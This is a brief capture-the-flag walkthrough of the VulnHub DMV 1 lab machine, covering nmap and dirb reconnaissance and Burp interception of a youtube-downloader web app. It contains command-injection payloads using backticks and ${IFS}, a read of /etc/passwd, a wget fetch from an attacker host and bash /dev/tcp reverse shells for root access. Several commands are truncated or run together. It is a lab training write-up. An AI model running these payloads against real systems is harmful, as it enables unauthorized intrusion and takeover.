VulnHub: DMV 1

4 min readMay 4, 2020


  1. Scan network
nmap -sn <ip range>

2. Scan for open ports

nmap -Pn <ip>

3. Scan for open ports with high port number

nmap -Pn -p- <ip>

4. Scan for service

nmap -sV <ip>

5. Scan for vulnerability

nmap --script vuln <ip>

6. Fuzzing directory

dirb http://<ip>

7. Try login to ssh

ssh <ip>

8. Access site



  1. Seems like it’s youtube downloader

2. Let’s try some video

Paste Video ID


3. Let’s try again with other video

Still error!!!

4. Intercept with Burp Suite

Send to Repeater

Send the request, there’s an error in result

5. Let’s google the result
I came across to this link:

Access project page, read the manual

6. Back to repeater, try some command


Read passwd file

--exec`cat /etc/passwd`


Replace space with “${IFS}”


7. Reverse shell
Create listener

nc -lvp 1234

Try reverse shell command




Let’s try another way, I will upload reverse shell file to victim’s machine instead

Create python reverse shell and save it as “”

Create HTTP Server

python -m SimpleHTTPServer <port no.>

Back to repeater

--exec`cd${IFS}/var/www/html/images/;wget{IFS}http://<attacker ip>:<attacker port>/`

Privilege Escalation

  1. First flag
cd admincat flag.txt

2. Get root access

cd /tmplscat clean.shecho 'bash -i >& /dev/tcp/ 0>&1' >

Back to attacker’s machine, we already have listener on port 1234.

Wait for a moment

Now, I have root shell

cd /rootls cat root.txt